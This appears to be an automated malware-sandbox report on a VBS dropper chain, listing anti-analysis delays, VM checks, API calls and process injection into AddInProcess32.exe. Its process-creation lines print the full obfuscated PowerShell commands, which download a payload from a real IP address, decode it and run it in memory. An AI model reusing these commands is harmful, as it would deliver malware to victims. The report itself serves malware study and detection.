                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2065Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 830Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5149Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4584Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2754Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1805Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2364Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 7226Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 5149 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 4584 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 2754 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep count: 1805 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560Thread sleep count: 171 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560Thread sleep time: -85500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564Thread sleep count: 2364 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564Thread sleep time: -7092000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564Thread sleep count: 7226 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564Thread sleep time: -21678000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,15_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0044D5E9 FindFirstFileExA,15_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,15_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,15_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,15_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,15_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406F06
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp,
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                  Source: powershell.exe, 00000007.00000002.1513412775.0000025F2893F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: PING.EXE, 0000000C.00000002.1349503253.000001B92B449000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_15-48241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00442554 mov eax, dword ptr fs:[00000030h]15_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0044E92E GetProcessHeap,15_2_0044E92E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00433B44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00433CD7 SetUnhandledExceptionFilter,15_2_00433CD7

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Encrypted powershell cmdline option found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ;
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 457000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 470000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FF0008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_00410F36
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00418754 mouse_event,15_2_00418754
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /cJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat textJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat text
